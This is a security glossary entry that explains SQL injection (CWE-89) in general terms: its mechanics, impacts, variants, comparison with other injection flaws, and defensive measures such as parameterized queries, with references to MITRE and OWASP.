SQL Injection (SQLi) — Executing Unauthorized Database Queries
SQL Injection (SQLi) is a vulnerability that allows attackers to manipulate database queries by injecting malicious input into application fields. This SECMONS glossary entry explains how SQL injection works, common impact scenarios, and how defenders should mitigate and detect it.
What Is SQL Injection (SQLi)? 🧠
SQL Injection (SQLi) is a vulnerability that occurs when untrusted user input is improperly incorporated into database queries, allowing attackers to execute unintended SQL commands.
It is formally classified as CWE-89 — Improper Neutralization of Special Elements used in an SQL Command under the /glossary/cwe/ taxonomy.
When disclosed publicly, SQL injection vulnerabilities receive a /glossary/cve/ identifier and are scored via /glossary/cvss/.
How SQL Injection Works 🔎
A vulnerable application might build database queries dynamically without proper input validation or parameterization.
For example:
- A login form directly inserts user input into an SQL statement.
- An attacker supplies crafted input that alters the query logic.
- The database executes the modified query.
Common exploitation outcomes include:
- Authentication bypass
- Data extraction
- Data modification
- Account takeover
- Database deletion
In certain environments, SQL injection may also lead to operating system command execution, escalating into /glossary/remote-code-execution/.
Why SQL Injection Is Dangerous 🎯
SQL injection directly targets backend databases, which often store:
- User credentials
- Personal information
- Payment data
- Internal application logic
- Administrative configuration
Because databases frequently contain sensitive information, SQL injection can result in large-scale data breaches documented under /breaches/.
In some cases, SQL injection also becomes a form of /glossary/initial-access/ when exposed services are internet-facing.
Types of SQL Injection 🔬
| Type | Description |
|---|---|
| In-band SQLi | Data retrieved through same communication channel |
| Blind SQLi | Data inferred through response behavior |
| Time-based SQLi | Data inferred through response delays |
| Out-of-band SQLi | Data exfiltrated through alternate channels |
Each variation depends on how the application processes input and returns responses.
SQL Injection vs Other Injection Attacks 🔄
| Vulnerability | Target |
|---|---|
| SQL Injection | Database queries |
| Command Injection | Operating system commands |
| LDAP Injection | Directory services |
| Cross-Site Scripting | Browser execution context |
All injection flaws share a common theme: insufficient input sanitization.
Defensive Considerations 🛡️
Preventing SQL injection requires:
- Parameterized queries (prepared statements)
- Input validation and sanitization
- Least privilege database accounts
- Web application firewalls (WAF)
- Secure coding practices
- Regular security testing
If a SQL injection vulnerability is confirmed as /glossary/exploited-in-the-wild/ or included in /glossary/known-exploited-vulnerabilities-kev/, remediation must be immediate.
Operational mitigation guidance is typically documented under:
Why SECMONS Tracks SQL Injection Carefully 📌
Despite being one of the oldest web vulnerabilities, SQL injection remains a recurring cause of major data breaches.
Clear classification and structured explanation ensure that readers understand both the technical mechanics and operational impact.
Authoritative References 📎
- MITRE CWE-89 Entry: https://cwe.mitre.org/data/definitions/89.html
- OWASP SQL Injection Prevention Cheat Sheet: https://owasp.org/